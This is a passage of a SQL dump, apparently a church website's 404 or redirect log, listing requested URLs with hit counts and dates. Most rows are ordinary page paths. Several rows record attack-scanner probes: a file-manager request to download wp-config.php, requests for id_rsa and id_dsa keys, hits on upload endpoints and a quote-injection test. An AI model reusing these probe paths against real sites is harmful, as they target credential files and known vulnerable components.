(4946, 'http://www.lifeoasisinternationalchurch.org/prayer/component/mailto/?tmpl=component&template=prayer5&link=54229c74ca59b7fa98c634f79e44bee94c11a6e4', NULL, '', '', 1, 0, '2017-04-21 18:26:50', '0000-00-00 00:00:00', 301),
(4947, 'http://www.lifeoasisinternationalchurch.org/steaming', NULL, '', '', 3, 0, '2017-04-21 18:51:46', '0000-00-00 00:00:00', 301),
(4948, 'http://lifeoasisinternationalchurch.org/index.php?option=com_k2&amp;view=itemlist&amp;Itemid=622&amp;month=3&amp;year=2017&amp;task=calendar', NULL, '', '', 1, 0, '2017-04-21 20:59:31', '0000-00-00 00:00:00', 301),
(4949, 'http://lifeoasisinternationalchurch.org/index.php?option=com_k2&amp;view=itemlist&amp;Itemid=622&amp;month=5&amp;year=2017&amp;task=calendar', NULL, '', '', 1, 0, '2017-04-21 20:59:31', '0000-00-00 00:00:00', 301),
(4950, 'http://lifeoasisinternationalchurch.org/streamig', NULL, '', '', 3, 0, '2017-04-22 12:04:14', '0000-00-00 00:00:00', 301),
(4951, 'http://lifeoasisinternationalchurch.org/online-giving/gtpay', NULL, '', '', 48, 0, '2017-04-22 17:54:33', '0000-00-00 00:00:00', 301),
(4952, 'http://www.lifeoasisinternationalchurch.org/prayer-request/8-newsflash', NULL, '', '', 2, 0, '2017-04-22 18:37:32', '0000-00-00 00:00:00', 301),
(4953, 'http://lifeoasisinternationalchurch.org/index.php/252-day-16-of-21-days-fasting-and-prayer-october-2', NULL, '', '', 1, 0, '2017-04-22 23:50:13', '0000-00-00 00:00:00', 301),
(4954, 'http://lifeoasisinternationalchurch.org/media/mass.php', NULL, '', '', 2, 0, '2017-04-23 00:08:07', '0000-00-00 00:00:00', 301),
(4955, 'http://lifeoasisinternationalchurch.org/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes', NULL, '', '', 1, 0, '2017-04-23 00:08:09', '0000-00-00 00:00:00', 301),
(4956, 'http://lifeoasisinternationalchurch.org/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes', NULL, '', '', 1, 0, '2017-04-23 00:08:10', '0000-00-00 00:00:00', 301),
(4957, 'http://lifeoasisinternationalchurch.org/index.php?option=com_myblog&task=ajaxupload', NULL, '', '', 1, 0, '2017-04-23 01:53:10', '0000-00-00 00:00:00', 301),
(4958, 'http://lifeoasisinternationalchurch.org/index.php?option=com_adsmanager&task=upload&tmpl=component', NULL, '', '', 1, 0, '2017-04-23 01:53:11', '0000-00-00 00:00:00', 301),
(4959, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/11-grace-3', NULL, '', '', 2, 0, '2017-04-23 06:39:41', '0000-00-00 00:00:00', 301),
(4960, 'http://www.lifeoasisinternationalchurch.org/resources/streaming2/18-loic/50-young-achievers', NULL, '', '', 4, 0, '2017-04-23 06:39:43', '0000-00-00 00:00:00', 301),
(4961, 'https://lifeoasisinternationalchurch.org/media.html', NULL, '', '', 12, 0, '2017-04-23 07:24:14', '0000-00-00 00:00:00', 301),
(4962, 'http://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/11-prayer-a-fasting-day-2', NULL, '', '', 2, 0, '2017-04-23 08:21:07', '0000-00-00 00:00:00', 301),
(4963, 'https://lifeoasisinternationalchurch.org/template-info/books', NULL, '', '', 51, 0, '2017-04-23 11:26:12', '0000-00-00 00:00:00', 301),
(4964, 'http://lifeoasisinternationalchurch.org/register/', NULL, '', '', 12, 0, '2017-04-23 16:43:34', '0000-00-00 00:00:00', 301),
(4965, 'http://lifeoasisinternationalchurch.org/login.php', NULL, '', '', 13, 0, '2017-04-23 16:43:35', '0000-00-00 00:00:00', 301),
(4966, 'http://lifeoasisinternationalchurch.org/signup.php', NULL, '', '', 12, 0, '2017-04-23 16:43:36', '0000-00-00 00:00:00', 301),
(4967, 'http://lifeoasisinternationalchurch.org/blog//register/', NULL, '', '', 8, 0, '2017-04-23 16:43:39', '0000-00-00 00:00:00', 301),
(4968, 'http://lifeoasisinternationalchurch.org/blog//login.php', NULL, '', '', 8, 0, '2017-04-23 16:43:41', '0000-00-00 00:00:00', 301),
(4969, 'http://lifeoasisinternationalchurch.org/blog//signup.php', NULL, '', '', 8, 0, '2017-04-23 16:43:42', '0000-00-00 00:00:00', 301),
(4970, 'http://lifeoasisinternationalchurch.org/index.php/254-day-19-of-22-days-fasting-and-prayer-october', NULL, '', '', 1, 0, '2017-04-23 17:46:41', '0000-00-00 00:00:00', 301),
(4971, 'http://lifeoasisinternationalchurch.org/index.php/template-info/outreach/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-04-24 07:38:05', '0000-00-00 00:00:00', 301),
(4972, 'http://lifeoasisinternationalchurch.org/protocol.html', NULL, '', '', 1, 0, '2017-04-24 16:11:41', '0000-00-00 00:00:00', 301),
(4973, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/3-dark-side-of-the-anointing-1', NULL, '', '', 137, 0, '2017-04-24 18:41:35', '0000-00-00 00:00:00', 301),
(4974, 'https://lifeoasisinternationalchurch.org/template-info/gin', NULL, '', '', 12, 0, '2017-04-24 19:40:30', '0000-00-00 00:00:00', 301),
(4975, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/11-prayer-a-fasting-day-2', NULL, '', '', 2, 0, '2017-04-24 19:49:01', '0000-00-00 00:00:00', 301),
(4976, 'http://lifeoasisinternationalchurch.org/index.php/255-day-20-of-21-days-fasting-and-prayer-october', NULL, '', '', 2, 0, '2017-04-24 21:57:36', '0000-00-00 00:00:00', 301),
(4977, 'https://lifeoasisinternationalchurch.org/loic/conventions.php', NULL, '', '', 7, 0, '2017-04-25 04:35:58', '0000-00-00 00:00:00', 301),
(4978, 'https://lifeoasisinternationalchurch.org/index.php/161-day-33', NULL, '', '', 13, 0, '2017-04-25 09:13:11', '0000-00-00 00:00:00', 301),
(4979, 'http://www.lifeoasisinternationalchurch.org/online-giving/gtpay', NULL, '', '', 15, 0, '2017-04-25 13:59:39', '0000-00-00 00:00:00', 301),
(4980, 'https://www.lifeoasisinternationalchurch.org/periscope/private', NULL, '', '', 1, 0, '2017-04-25 15:29:17', '0000-00-00 00:00:00', 301),
(4981, 'http://www.lifeoasisinternationalchurch.org/streaming-private', NULL, '', '', 1, 0, '2017-04-25 15:41:58', '0000-00-00 00:00:00', 301),
(4982, 'http://lifeoasisinternationalchurch.org/resources/live-streaming/privatestream', NULL, '', '', 1, 0, '2017-04-25 17:41:25', '0000-00-00 00:00:00', 301),
(4983, 'http://lifeoasisinternationalchurch.org/resources/live-streaming/privatestreaming', NULL, '', '', 1, 0, '2017-04-25 17:41:32', '0000-00-00 00:00:00', 301),
(4984, 'http://lifeoasisinternationalchurch.org/resources/privatestreaming', NULL, '', '', 1, 0, '2017-04-25 17:41:51', '0000-00-00 00:00:00', 301),
(4985, 'http://lifeoasisinternationalchurch.org/resources/privatestream', NULL, '', '', 1, 0, '2017-04-25 17:42:13', '0000-00-00 00:00:00', 301),
(4986, 'http://lifeoasisinternationalchurch.org/privatestream', NULL, '', '', 3, 0, '2017-04-25 17:42:26', '0000-00-00 00:00:00', 301),
(4987, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info/wimmp', NULL, '', '', 2, 0, '2017-04-25 22:20:03', '0000-00-00 00:00:00', 301),
(4988, 'http://lifeoasisinternationalchurch.org/ministries/gin/18-loic/50-young-achievers', NULL, 'http://lifeoasisinternationalchurch.org/ministries/gin', '', 1, 0, '2017-04-25 23:36:37', '0000-00-00 00:00:00', 301),
(4989, 'http://lifeoasisinternationalchurch.org/ministries/ljmti/18-loic/50-young-achievers', NULL, 'http://lifeoasisinternationalchurch.org/ministries/ljmti', '', 1, 0, '2017-04-26 06:36:25', '0000-00-00 00:00:00', 301),
(4990, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/44-prayer-a-fasting-day-35', NULL, '', '', 17, 0, '2017-04-26 06:57:07', '0000-00-00 00:00:00', 301),
(4991, 'https://www.lifeoasisinternationalchurch.org/livestreaming', NULL, '', '', 292, 0, '2017-04-26 16:23:32', '0000-00-00 00:00:00', 301),
(4992, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/20-welcome', NULL, '', '', 2, 0, '2017-04-26 18:06:16', '0000-00-00 00:00:00', 301),
(4993, 'http://lifeoasisinternationalchurch.org/feedback.php', NULL, '', '', 2, 0, '2017-04-26 21:37:18', '0000-00-00 00:00:00', 301),
(4994, 'http://www.lifeoasisinternationalchurch.org/resources/zion-pillar', NULL, '', '', 1, 0, '2017-04-27 00:46:22', '0000-00-00 00:00:00', 301),
(4995, 'http://www.lifeoasisinternationalchurch.org/index.php/component/content/18-loic/45-church-location?itemid=190', NULL, '', '', 1, 0, '2017-04-27 00:46:28', '0000-00-00 00:00:00', 301),
(4996, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info/ljmti/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-04-27 00:46:32', '0000-00-00 00:00:00', 301),
(4997, 'http://lifeoasisinternationalchurch.org/home/index.php/component/content/article/5-welcome', NULL, '', '', 3, 0, '2017-04-27 01:11:52', '0000-00-00 00:00:00', 301),
(4998, 'http://www.lifeoasisinternationalchurch.org/?id=featured&format=feed&type=rss', NULL, '', '', 12, 0, '2017-04-27 04:47:23', '0000-00-00 00:00:00', 301),
(4999, 'https://lifeoasisinternationalchurch.org/gallery', NULL, '', '', 62, 0, '2017-04-27 05:25:03', '0000-00-00 00:00:00', 301),
(5000, 'https://lifeoasisinternationalchurch.org/index.php/59-2014-1', NULL, '', '', 11, 0, '2017-04-27 09:20:42', '0000-00-00 00:00:00', 301),
(5001, 'http://lifeoasisinternationalchurch.org/images/abundant-life', NULL, 'http://lifeoasisinternationalchurch.org/administrator/index.php?option=com_roksprocket&view=module&layout=edit&id=314', '', 1, 0, '2017-04-27 11:25:21', '0000-00-00 00:00:00', 301),
(5002, 'http://lifeoasisinternationalchurch.org/images/abundant-lif', NULL, 'http://lifeoasisinternationalchurch.org/administrator/index.php?option=com_roksprocket&view=module&layout=edit&id=314', '', 1, 0, '2017-04-27 11:25:22', '0000-00-00 00:00:00', 301),
(5003, 'http://lifeoasisinternationalchurch.org/trimp.php', NULL, '', '', 2, 0, '2017-04-27 12:22:28', '0000-00-00 00:00:00', 301),
(5004, 'http://lifeoasisinternationalchurch.org/index.php/248-day-12-of-21-days-fasting-and-prayer-october', NULL, '', '', 2, 0, '2017-04-27 12:39:06', '0000-00-00 00:00:00', 301),
(5005, 'http://lifeoasisinternationalchurch.org/index.php/258-day-9-of-21-days-fasting-and-prayer-october', NULL, '', '', 2, 0, '2017-04-27 12:44:49', '0000-00-00 00:00:00', 301),
(5006, 'http://www.lifeoasisinternationalchurch.org/ministries/mimmp/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-04-27 17:13:44', '0000-00-00 00:00:00', 301),
(5007, 'http://www.lifeoasisinternationalchurch.org/?id=featured&format=feed&type=atom', NULL, '', '', 17, 0, '2017-04-27 18:04:25', '0000-00-00 00:00:00', 301),
(5008, 'http://lifeoasisinternationalchurch.org/index.php/259-day-13-of-21-days-fasting-and-prayer-october', NULL, '', '', 1, 0, '2017-04-28 03:31:15', '0000-00-00 00:00:00', 301),
(5009, 'http://lifeoasisinternationalchurch.org/index.php/266-day-6-of-21-days-fasting-and-prayer-november', NULL, '', '', 1, 0, '2017-04-28 04:29:32', '0000-00-00 00:00:00', 301),
(5010, 'https://lifeoasisinternationalchurch.org/online-giving/gtpay', NULL, '', '', 16, 0, '2017-04-28 05:36:27', '0000-00-00 00:00:00', 301),
(5011, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/18-sample-content-7', NULL, '', '', 1, 0, '2017-04-28 06:38:04', '0000-00-00 00:00:00', 301),
(5012, 'https://142.4.21.132/current_config/account1', NULL, '', '', 6, 0, '2017-04-28 07:27:15', '0000-00-00 00:00:00', 301),
(5013, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/popup', NULL, '', '', 20, 0, '2017-04-28 16:49:44', '0000-00-00 00:00:00', 301),
(5014, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/19', NULL, '', '', 1, 0, '2017-04-28 22:42:35', '0000-00-00 00:00:00', 301),
(5015, 'http://lifeoasisinternationalchurch.org/daughtersofdestiny', NULL, '', '', 1, 0, '2017-04-29 00:35:59', '0000-00-00 00:00:00', 301),
(5016, 'http://lifeoasisinternationalchurch.org/dreamcentre.html', NULL, '', '', 3, 0, '2017-04-29 10:07:42', '0000-00-00 00:00:00', 301),
(5017, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/16/15', NULL, '', '', 4, 0, '2017-04-29 21:32:41', '0000-00-00 00:00:00', 301),
(5018, 'http://lifeoasisinternationalchurch.org/ad/', NULL, '', '', 1, 0, '2017-04-30 05:46:51', '0000-00-00 00:00:00', 301),
(5019, 'http://lifeoasisinternationalchurch.org/index.php/242-day-4-of-21-days-fasting-and-prayer-october', NULL, '', '', 1, 0, '2017-04-30 06:57:14', '0000-00-00 00:00:00', 301),
(5020, 'https://www.lifeoasisinternationalchurch.org/https://www.lifeoasisinternationalchurch.org/', NULL, '', '', 86, 0, '2017-04-30 07:36:01', '0000-00-00 00:00:00', 301),
(5021, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info/mimmp/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-04-30 10:34:07', '0000-00-00 00:00:00', 301),
(5022, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info-2/our-service-schedule/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-04-30 10:51:51', '0000-00-00 00:00:00', 301),
(5023, 'https://lifeoasisinternationalchurch.org/loic/kingdombuilders.php', NULL, '', '', 17, 0, '2017-04-30 15:54:21', '0000-00-00 00:00:00', 301),
(5024, 'http://www.lifeoasisinternationalchurch.org/2-features\'a=0', NULL, 'http://www.lifeoasisinternationalchurch.org/2-features\'A=0', '', 1, 0, '2017-04-30 19:11:43', '0000-00-00 00:00:00', 301),
(5025, 'http://lifeoasisinternationalchurch.org/index.php/130-prayer-focus-for-day-7', NULL, '', '', 1, 0, '2017-04-30 20:20:51', '0000-00-00 00:00:00', 301),
(5026, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/11-demo-articles/5-menu-options', NULL, '', '', 2, 0, '2017-05-01 01:30:56', '0000-00-00 00:00:00', 301),
(5027, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/14-entering-into-winning-position-2', NULL, '', '', 3, 0, '2017-05-01 05:10:46', '0000-00-00 00:00:00', 301),
(5028, 'http://www.lifeoasisinternationalchurch.org/carer', NULL, '', '', 1, 0, '2017-05-01 07:08:57', '0000-00-00 00:00:00', 301),
(5029, 'http://www.lifeoasisinternationalchurch.org/career', NULL, '', '', 1, 0, '2017-05-01 07:09:08', '0000-00-00 00:00:00', 301),
(5030, 'http://www.lifeoasisinternationalchurch.org/careers', NULL, '', '', 1, 0, '2017-05-01 07:09:12', '0000-00-00 00:00:00', 301),
(5031, 'http://www.lifeoasisinternationalchurch.org/carers', NULL, '', '', 1, 0, '2017-05-01 07:09:19', '0000-00-00 00:00:00', 301),
(5032, 'http://lifeoasisinternationalchurch.org/resources/private stream', NULL, '', '', 1, 0, '2017-05-01 08:13:46', '0000-00-00 00:00:00', 301),
(5033, 'http://lifeoasisinternationalchurch.org/resources/privat-stream', NULL, '', '', 1, 0, '2017-05-01 08:13:55', '0000-00-00 00:00:00', 301),
(5034, 'http://www.lifeoasisinternationalchurch.org/privive-streaming', NULL, '', '', 1, 0, '2017-05-01 08:40:35', '0000-00-00 00:00:00', 301),
(5035, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/19/15', NULL, '', '', 2, 0, '2017-05-01 11:38:56', '0000-00-00 00:00:00', 301),
(5036, 'http://lifeoasisinternationalchurch.org/t', NULL, '', '', 1, 0, '2017-05-01 18:52:00', '0000-00-00 00:00:00', 301),
(5037, 'http://lifeoasisinternationalchurch.org/streamin', NULL, '', '', 6, 0, '2017-05-02 00:31:00', '0000-00-00 00:00:00', 301),
(5038, 'http://www.lifeoasisinternationalchurch.org/yout', NULL, '', '', 3, 0, '2017-05-02 06:14:05', '0000-00-00 00:00:00', 301),
(5039, 'http://lifeoasisinternationalchurch.org/stewards', NULL, '', '', 3, 0, '2017-05-02 17:51:53', '0000-00-00 00:00:00', 301),
(5040, 'http://www.lifeoasisinternationalchurch.org/about-us/broadcast-schedule', NULL, '', '', 43, 0, '2017-05-02 23:20:28', '0000-00-00 00:00:00', 301),
(5041, 'http://lifeoasisinternationalchurch.org/resources/sermon-notes', NULL, 'http://lifeoasisinternationalchurch.org/resources/bible-reading', '', 80, 0, '2017-05-02 23:47:28', '0000-00-00 00:00:00', 301),
(5042, 'http://lifeoasisinternationalchurch.org/resources/bible-reading', NULL, 'http://lifeoasisinternationalchurch.org/resources/broadcast-schedule', '', 29, 0, '2017-05-02 23:47:28', '0000-00-00 00:00:00', 301),
(5043, 'http://www.lifeoasisinternationalchurch.org/resources/sermon-notes', NULL, 'http://www.lifeoasisinternationalchurch.org/resources/sermon-notes', '', 99, 0, '2017-05-02 23:50:30', '0000-00-00 00:00:00', 301),
(5044, 'http://lifeoasisinternationalchurch.org/id_rsa', NULL, '', '', 3, 0, '2017-05-03 02:14:30', '0000-00-00 00:00:00', 301),
(5045, 'http://lifeoasisinternationalchurch.org/srea', NULL, '', '', 1, 0, '2017-05-03 05:46:39', '0000-00-00 00:00:00', 301),
(5046, 'http://www.lifeoasisinternationalchurch.org/id_rsa', NULL, '', '', 3, 0, '2017-05-03 08:30:38', '0000-00-00 00:00:00', 301),
(5047, 'https://www.lifeoasisinternationalchurch.org/resources/sermon-notes?download=14:sermon-notes-20-02-2017', NULL, 'http://www.google.com.ng/search?client=ms-opera-mini-android&channel=new&q=rev+olusola+areogun+messages&sa=X&ved=0ahUKEwjf3P7TgNTTAhURKlAKHYXpBSkQ1QIIRygB&biw=600&bih=1024', '', 2, 0, '2017-05-03 15:10:35', '0000-00-00 00:00:00', 301),
(5048, 'http://www.lifeoasisinternationalchurch.org/about-us/testimonies', NULL, '', '', 36, 0, '2017-05-03 16:32:13', '0000-00-00 00:00:00', 301),
(5049, 'http://www.lifeoasisinternationalchurch.org/livestreamingok', NULL, '', '', 1, 0, '2017-05-03 17:06:52', '0000-00-00 00:00:00', 301),
(5050, 'https://lifeoasisinternationalchurch.org/about-us/testimonies', NULL, 'https://lifeoasisinternationalchurch.org/', '', 107, 0, '2017-05-03 17:14:14', '0000-00-00 00:00:00', 301),
(5051, 'https://lifeoasisinternationalchurch.org/resources/sermon-notes', NULL, '', '', 57, 0, '2017-05-03 17:54:31', '0000-00-00 00:00:00', 301),
(5052, 'http://www.lifeoasisinternationalchurch.org/id_dsa', NULL, '', '', 3, 0, '2017-05-04 04:07:31', '0000-00-00 00:00:00', 301),
(5053, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/20602', NULL, '', '', 1, 0, '2017-05-04 10:49:46', '0000-00-00 00:00:00', 301),
(5054, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/98883', NULL, '', '', 1, 0, '2017-05-04 10:58:56', '0000-00-00 00:00:00', 301),
(5055, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/44056', NULL, '', '', 1, 0, '2017-05-04 11:02:55', '0000-00-00 00:00:00', 301),
(5056, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/31810', NULL, '', '', 1, 0, '2017-05-04 13:50:44', '0000-00-00 00:00:00', 301),
(5057, 'https://lifeoasisinternationalchurch.org/index.php?option=com_easyblog&view=dashboard&layout=write', NULL, 'https://lifeoasisinternationalchurch.org/', '', 5056, 0, '2017-05-04 15:16:23', '0000-00-00 00:00:00', 301),
(5058, 'https://lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', NULL, 'https://lifeoasisinternationalchurch.org/component/users/?view=login&Itemid=101', '', 5253, 0, '2017-05-04 15:16:28', '0000-00-00 00:00:00', 301),
(5059, 'https://lifeoasisinternationalchurch.org/index.php/component/user/?task=register', NULL, 'https://lifeoasisinternationalchurch.org/index.php?option=com_user&view=register', '', 9611, 0, '2017-05-04 15:16:29', '0000-00-00 00:00:00', 301),
(5060, 'https://lifeoasisinternationalchurch.org/component/user/?task=register', NULL, 'https://lifeoasisinternationalchurch.org/component/users/?view=login&Itemid=101', '', 9299, 0, '2017-05-04 15:16:32', '0000-00-00 00:00:00', 301),
(5061, 'https://lifeoasisinternationalchurch.org/option=com_user?view=register', NULL, 'https://lifeoasisinternationalchurch.org/component/user/?task=register', '', 9333, 0, '2017-05-04 15:16:33', '0000-00-00 00:00:00', 301),
(5062, 'http://www.lifeoasisinternationalchurch.org/;', NULL, '', '', 1, 0, '2017-05-04 16:45:43', '0000-00-00 00:00:00', 301),
(5063, 'https://www.lifeoasisinternationalchurch.org/resources/sermon-notes?download=15:lba', NULL, '', '', 1, 0, '2017-05-05 00:26:18', '0000-00-00 00:00:00', 301),
(5064, 'https://www.lifeoasisinternationalchurch.org/resources/sermon-notes', NULL, '', '', 282, 0, '2017-05-05 02:10:47', '0000-00-00 00:00:00', 301),
(5065, 'http://lifeoasisinternationalchurch.org/id_dsa', NULL, '', '', 2, 0, '2017-05-05 03:23:57', '0000-00-00 00:00:00', 301),
(5066, 'http://www.lifeoasisinternationalchurch.org/sermon/3-dark-side-of-the-anointing-1', NULL, 'http://www.lifeoasisinternationalchurch.org/sermon/3-dark-side-of-the-anointing-1', '', 1, 0, '2017-05-05 04:22:13', '0000-00-00 00:00:00', 301),
(5067, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/12-sample-content-1', NULL, '', '', 2, 0, '2017-05-05 06:58:13', '0000-00-00 00:00:00', 301),
(5068, 'http://www.lifeoasisinternationalchurch.org/bibleschool.html', NULL, '', '', 2, 0, '2017-05-05 11:57:09', '0000-00-00 00:00:00', 301),
(5069, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/35921', NULL, '', '', 1, 0, '2017-05-05 13:38:28', '0000-00-00 00:00:00', 301),
(5070, 'http://www.lifeoasisinternationalchurch.org/ministry.html', NULL, '', '', 1, 0, '2017-05-05 13:41:36', '0000-00-00 00:00:00', 301),
(5071, 'http://www.lifeoasisinternationalchurch.org/index.php/forum/topic/create', NULL, 'http://www.lifeoasisinternationalchurch.org', '', 4, 0, '2017-05-05 18:05:05', '0000-00-00 00:00:00', 301),
(5072, 'http://lifeoasisinternationalchurch.org/about-us/testimonies', NULL, '', '', 55, 0, '2017-05-05 21:04:56', '0000-00-00 00:00:00', 301),
(5073, 'http://lifeoasisinternationalchurch.org/component/content/article/18-loic/35-trm', NULL, '', '', 1, 0, '2017-05-06 01:58:26', '0000-00-00 00:00:00', 301),
(5074, 'http://lifeoasisinternationalchurch.org/index.php/template-info/media-outreach/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-05-06 03:57:10', '0000-00-00 00:00:00', 301),
(5075, 'https://lifeoasisinternationalchurch.org/component/content/category/12-sample-content?format=feed&type=rss', NULL, '', '', 1, 0, '2017-05-06 04:29:24', '0000-00-00 00:00:00', 301),
(5076, 'http://lifeoasisinternationalchurch.org/live2.php', NULL, '', '', 1, 0, '2017-05-06 06:55:07', '0000-00-00 00:00:00', 301),
(5077, 'http://lifeoasisinternationalchurch.org/template-info/music', NULL, '', '', 2, 0, '2017-05-06 10:49:44', '0000-00-00 00:00:00', 301),
(5078, 'http://www.lifeoasisinternationalchurch.org/prophetic.html', NULL, '', '', 2, 0, '2017-05-06 11:25:33', '0000-00-00 00:00:00', 301),
(5079, 'http://lifeoasisinternationalchurch.org/loic/partnership.php', NULL, '', '', 11, 0, '2017-05-06 13:46:43', '0000-00-00 00:00:00', 301),
(5080, 'http://lifeoasisinternationalchurch.org/wp-admin/admin-ajax.php', NULL, 'http://lifeoasisinternationalchurch.org/wp-admin/admin-ajax.php', '', 10, 0, '2017-05-06 15:41:20', '0000-00-00 00:00:00', 301),
(5081, 'http://www.lifeoasisinternationalchurch.org/index.php/158-day-30', NULL, '', '', 3, 0, '2017-05-06 17:41:01', '0000-00-00 00:00:00', 301),
(5082, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=47&itemid=189', NULL, '', '', 1, 0, '2017-05-06 17:50:08', '0000-00-00 00:00:00', 301),
(5083, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=50:young-achievers&catid=18:loic', NULL, '', '', 1, 0, '2017-05-06 17:51:12', '0000-00-00 00:00:00', 301),
(5084, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=41&itemid=215', NULL, '', '', 1, 0, '2017-05-06 17:51:38', '0000-00-00 00:00:00', 301),
(5085, 'http://lifeoasisinternationalchurch.org/about-us/broadcast-schedule', NULL, '', '', 42, 0, '2017-05-06 17:51:50', '0000-00-00 00:00:00', 301),
(5086, 'http://www.lifeoasisinternationalchurch.org/index.php/162-day-34', NULL, '', '', 3, 0, '2017-05-07 06:10:31', '0000-00-00 00:00:00', 301),
(5087, 'http://lifeoasisinternationalchurch.org/templatat =', NULL, 'http://lifeoasisinternationalchurch.org/resources/live-streaming', '', 1, 0, '2017-05-07 06:13:54', '0000-00-00 00:00:00', 301),
(5088, 'http://www.lifeoasisinternationalchurch.org/message.html', NULL, '', '', 1, 0, '2017-05-07 08:39:08', '0000-00-00 00:00:00', 301),
(5089, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/18-prayer-a-fasting-day-10', NULL, '', '', 2, 0, '2017-05-07 09:29:44', '0000-00-00 00:00:00', 301),
(5090, 'http://www.lifeoasisinternationalchurch.org/resources/bible-reading', NULL, '', '', 16, 0, '2017-05-07 11:30:36', '0000-00-00 00:00:00', 301),
(5091, 'http://lifeoasisinternationalchurch.org/resources/blog/item/member.php?action=register', NULL, 'http://lifeoasisinternationalchurch.org/', '', 1, 0, '2017-05-07 12:22:23', '0000-00-00 00:00:00', 301),
(5092, 'http://lifeoasisinternationalchurch.org/resources/blog/item/register.php', NULL, 'http://lifeoasisinternationalchurch.org/', '', 1, 0, '2017-05-07 12:22:25', '0000-00-00 00:00:00', 301),
(5093, 'http://www.lifeoasisinternationalchurch.org/index.php/161-day-33', NULL, '', '', 3, 0, '2017-05-07 15:00:30', '0000-00-00 00:00:00', 301),
(5094, 'http://lifeoasisinternationalchurch.org/loic/zionpillars.php', NULL, '', '', 15, 0, '2017-05-07 15:17:37', '0000-00-00 00:00:00', 301),
(5095, 'https://lifeoasisinternationalchurch.org/searchreplacedb2.php', NULL, 'http://lifeoasisinternationalchurch.org/wp-admin/admin-ajax.php', '', 1, 0, '2017-05-07 15:28:29', '0000-00-00 00:00:00', 301),
(5096, 'http://www.lifeoasisinternationalchurch.org/index.php/143-day-17', NULL, '', '', 3, 0, '2017-05-07 15:41:22', '0000-00-00 00:00:00', 301),
(5097, 'http://www.lifeoasisinternationalchurch.org/11-prayer-a-fasting-day-2', NULL, '', '', 1, 0, '2017-05-07 20:35:31', '0000-00-00 00:00:00', 301),
(5098, 'http://www.lifeoasisinternationalchurch.org/-faith', NULL, '', '', 1, 0, '2017-05-07 21:16:50', '0000-00-00 00:00:00', 301),
(5099, 'http://lifeoasisinternationalchurch.org/accordion-a/level-21', NULL, '', '', 1, 0, '2017-05-07 21:45:11', '0000-00-00 00:00:00', 301),
(5100, 'http://www.lifeoasisinternationalchurch.org/photogallery/', NULL, '', '', 1, 0, '2017-05-07 22:32:26', '0000-00-00 00:00:00', 301),
(5101, 'http://lifeoasisinternationalchurch.org/loic/programmes.php', NULL, '', '', 12, 0, '2017-05-08 06:22:18', '0000-00-00 00:00:00', 301),
(5102, 'https://www.lifeoasisinternationalchurch.org/resources/bible-reading', NULL, '', '', 189, 0, '2017-05-08 08:31:55', '0000-00-00 00:00:00', 301),
(5103, 'http://lifeoasisinternationalchurch.org/test386.php', NULL, '', '', 1, 0, '2017-05-08 09:55:16', '0000-00-00 00:00:00', 301),
(5104, 'http://lifeoasisinternationalchurch.org/administrator/cachefix.php', NULL, 'http://lifeoasisinternationalchurch.org/administrator/cachefix.php', '', 1, 0, '2017-05-08 12:03:25', '0000-00-00 00:00:00', 301),
(5105, 'http://lifeoasisinternationalchurch.org/administrator/bn.php', NULL, 'http://lifeoasisinternationalchurch.org/administrator/bn.php', '', 1, 0, '2017-05-08 12:03:25', '0000-00-00 00:00:00', 301),
(5106, 'http://lifeoasisinternationalchurch.org//index.php?option=com_easyblog&view=dashboard&layout=write', NULL, 'https://lifeoasisinternationalchurch.org/', '', 4, 0, '2017-05-08 14:53:13', '0000-00-00 00:00:00', 301),
(5107, 'http://www.lifeoasisinternationalchurch.org/tьз', NULL, '', '', 1, 0, '2017-05-08 17:14:50', '0000-00-00 00:00:00', 301),
(5108, 'http://www.lifeoasisinternationalchurch.org/administrator/components/com_kunena', NULL, '', '', 1, 0, '2017-05-08 17:16:01', '0000-00-00 00:00:00', 301),
(5109, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/3-dark-side-of-the-anointing-1', NULL, '', '', 2, 0, '2017-05-08 18:14:14', '0000-00-00 00:00:00', 301),
(5110, 'http://www.lifeoasisinternationalchurch.org/components/com_kunena/', NULL, '', '', 1, 0, '2017-05-08 19:36:43', '0000-00-00 00:00:00', 301),
